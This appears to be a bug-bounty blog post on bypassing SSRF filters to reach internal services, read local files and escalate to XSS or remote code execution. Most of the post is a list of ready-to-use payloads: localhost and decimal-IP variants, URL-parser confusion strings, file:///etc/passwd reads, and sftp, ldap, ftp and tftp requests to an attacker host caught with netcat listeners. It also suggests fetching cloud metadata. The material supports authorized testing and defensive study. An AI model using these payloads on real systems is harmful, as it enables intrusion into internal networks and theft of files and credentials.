In this post I have shared how I use bypassing logics to convert SSRFs into RCEs and some other critical information disclosures which pays some good bounties $$$ and also shared some tools and resources which is very helpful into your testing.Read and scroll there are lot of takeaways from this post.
SSRF (Server Side Request Forgery) is a vulnerability where attacker allows to make crafted requests in behalf of web application.The end goal is to craft the requests to get data from internal systems which is behind the firewalls,IDS etc and inaccessible outside the organisation.
Types of SSRF:
- Basic : Where we get the response of the crafted request.
- Blind : where it doesn’t display the response but triggers the action.
Impact of the vulnerability –
- Scanning of the internal network.
- Read internally hosted files/data.
- Access services listening on the loopback interface (127.0.0.1)
- Read local system files.
- If it’s hosted on AWS, access the AWS REST interface
Let’s understand how to learn bypassing in SSRF scenarios to chain the bugs into a very critical phase.
Vulnerabilities are everywhere but practice and crystal clear of basic knowledge helps you to build the logic of bypassing, understanding the basics how URL parser works in different environments etc.
Let’s say we got a basic SSRF in the parameter, ?pageid=
Target URL : http://target.url/home.php?pageid=
Attacker server : http://subhajitsaha.com/blog
So to get reflected XSS we can simply fetch malicious JS file from external server .
http://target.url/home.php??pageid=https://subhajitsaha.com/blog/jvv/evilsvgfile.svg
TBH I don’t like this because we might not escalate reflected XSS many times but sometimes we can do some really good escalations, it totally depends on your scenarios.
Bypassing : Finding the internal services
http://target.url/home.php?pageid=http://localhost/anyinternalapps/admin.php
It can lead to scanning internal running services.But most of the times localhost is in the blacklist category so we need find some other ways to get into.My last bug of ssrf submission leads me to get into elastic search which is their internal service running without authentication.
pageid=http://127.0.0.1
pageid=http://localhost
For this other payloads can be use for bypassing:
http://127.0.0.1:80 http://127.0.0.1:443 http://127.0.0.1:22 http://0.0.0.0:80 http://0.0.0.0:443 http://0.0.0.0:22
http://spoofed.burpcollaborator.net we can use this host it will point towards 127.0.0.1 / localhost. You can create your custom subdomain and add DNS A record and point the host to 127.0.0.1 just simple ?
Also check nip.io it helps you to create custom domain mappings so you don’t need to edit etc/hosts file frequently. So whether you are doing Hack the box challenges or black box approaches it helps alot.
Abusing the parsers:
http://target.url/home.php?pageid=http://target.url#@subhajitsaha.com/blog
http://target.url:80\@subhajitsaha.com/blog:80/ http://target.url:80\@@subhajitsaha.com/blog:80/ http://target.url:80:\@@subhajitsaha.com/blog:80/ http://target.url:80#\@subhajitsaha.com/blog:80/
Here, http://target.url thinks the request is being made by their own domain/IP so it looks like a legit request as there is no interference by the third domain / attacker domain.But as we are using @ our URL parser will parse ‘@’ and redirects the request to the attacker domain.This is how we can abuse the parsers.Different parsers parse the URL schemas differently.
I am attaching the research of Orange Tsai , which is incredible and he presented in many conferences.Here is the link to view.
Abusing the parser with IP conversion :
We can abuse the parser by conversion the each 8 bit of IP into decimals.
I use this tool https://www.browserling.com/tools/ip-to-dec to convert IP addresses into decimals.
For example :
http://target.url/home.php?pageid=http://127.0.0.1 to http://target.url/home.php?pageid=http://2130706433
IP conversions and encoding bypass the blacklisted contents.
Sometimes double encoding also works for bypassing.
There are other few ways by using URL Schemes :
file://
http://target.url/home.php?pageid=file:///etc/passwd http://target.url/home.php?pageid=file://\/\/etc/passwd
sftp : http://target.url/home.php?pageid=sftp://subhajitsaha.com/blog:1337
subhajitsaha.com/blog:$ nc -lvp 1337
ldap : http://target.url/home.php?pageid=ldap://subhajitsaha.com/blog:1337 (ldaps , ldapi)
subhajitsaha.com/blog:$ nc -lvp 1337
ftp : http://target.url/home.php?pageid=ftp://subhajitsaha.com/blog:1337
subhajitsaha.com/blog:$ nc -lvp 1337
tftp : http://target.url/home.php?pageid=tftp://subhajitsaha.com/blog:1337
subhajitsaha.com/blog:$ nc -lvp 1337
Bypassing : By using Unicode circles
http://target.url/home.php?pageid=http://ⓢⓤⓑⓗⓐⓙⓘⓣⓢⓐⓗⓐ.ⓒⓞⓜ
Surprisingly, it works.The URL parser parse Unicode circles into plain text.
① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳ ⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾ ⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇ ⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗ ⒘ ⒙ ⒚ ⒛ ⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰ ⒱ ⒲ ⒳ ⒴ ⒵ Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ ⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ ⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿
Hope this will help you to understand how bypasses can be done.Keep all these payloads in your note or the best way to make a bash script to automate and generate payloads for you by taking 2 user inputs i.e. targeturl, attackerurl hope i will put that in my github soon.Also if you are on cloud instance try fetching metadata.
A week ago me and @dorkerdevil were testing a SSRF parameter and we made to RCE (Remote Code Execution) which is priority 1 bug.
Hope I shared some worth reading content.
Share with people it motivates me to write more posts.
Thanks for reading!
Also read : https://medium.com/@D0rkerDevil/how-i-convert-ssrf-to-xss-in-a-ssrf-vulnerable-jira-e9f37ad5b158